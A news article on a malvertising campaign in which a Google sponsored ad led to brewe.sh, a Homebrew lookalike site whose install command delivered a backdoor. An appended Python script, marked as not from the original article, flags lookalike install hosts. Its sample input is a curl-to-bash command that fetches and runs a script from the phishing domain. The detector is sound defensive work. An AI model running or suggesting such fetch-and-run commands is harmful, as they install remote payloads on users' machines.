A phishing website impersonating Homebrew, the open-source package manager for macOS, was recently found appearing in Google Search results. The incident highlights a critical flaw in Google’s ad system and raises concerns about the platform’s ability to filter out malicious content.
⚠️ Developers, please be careful when installing Homebrew.
Google is serving sponsored links to a Homebrew site clone that has a cURL command to malware. The URL for this site is one letter different than the official site. pic.twitter.com/TTpWRfqGWo
— Ryan Chenkie (@ryanchenkie) January 18, 2025
The phishing website was designed to look identical to the official Homebrew website (brew.sh). Users who clicked on the ad were redirected to this malicious website, which contained installation code for a backdoor. If executed, the backdoor could give attackers access to the user’s system and personal data.
It remains unclear how the phishing website was able to bypass Google’s ad system. Typically, Google requires domain verification before displaying ads, and past phishing attempts have often used non-Latin characters for obfuscation. In this case, the URL shown in the ad, brew.sh, looked legitimate at first glance.
Upon closer inspection, it was revealed that the actual domain of the phishing website was brewe.sh, not brew.sh. This discrepancy between the displayed and actual URLs raises questions about how Google’s ad system allowed such a mismatch to pass its verification process.
The phishing attack could have had serious consequences for users who inadvertently ran the installation code. The backdoor could have given attackers access to their systems and personal data, potentially leading to financial loss, identity theft, or other cyberattacks.
Users are advised to be cautious when clicking on ads for software or other products. It is always a good idea to verify the authenticity of the website before clicking on any links or downloading any software.
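One way to check an install command before running it, as an added example that is not from the original article: it extracts every URL from a pasted command and flags hosts that are a near miss of a trusted host (as brewe.sh is for brew.sh) or that use punycode. The trusted-host list, the function names and the sample command are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts the reader trusts for a Homebrew install. brew.sh is the
# official site named in the article; the GitHub raw host is an added assumption.
TRUSTED_HOSTS = ("brew.sh", "raw.githubusercontent.com")
URL_RE = re.compile(r"https?://[^\s\"'()<>]+")

def edit_distance(a, b):
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(host):
    """Return (status, nearest_trusted_host_or_None) for one hostname."""
    host = host.lower().rstrip(".")
    try:
        # Non-Latin lookalikes become visible as xn-- labels after IDNA encoding.
        ascii_host = host.encode("idna").decode("ascii")
    except UnicodeError:
        return ("invalid", None)
    if ascii_host in TRUSTED_HOSTS:
        return ("trusted", ascii_host)
    if any(label.startswith("xn--") for label in ascii_host.split(".")):
        return ("punycode", None)
    for trusted in TRUSTED_HOSTS:
        # One or two edits away from a trusted host: treat as a lookalike.
        if edit_distance(ascii_host, trusted) <= 2:
            return ("lookalike", trusted)
    return ("unknown", None)

def check_command(command):
    """Classify the host of every URL found in a pasted shell command."""
    results = []
    for url in URL_RE.findall(command):
        host = urlsplit(url).hostname or ""
        results.append((host,) + classify_host(host))
    return results

# Constructed sample: the path is made up; only the domain comes from the article.
SAMPLE = '/bin/bash -c "$(curl -fsSL https://brewe.sh/constructed/install.sh)"'

if __name__ == "__main__":
    for host, status, nearest in check_command(SAMPLE):
        print(host, status, nearest)
```

Only an exact match is reported as trusted; anything else, including "unknown", should be checked by hand before the command is run.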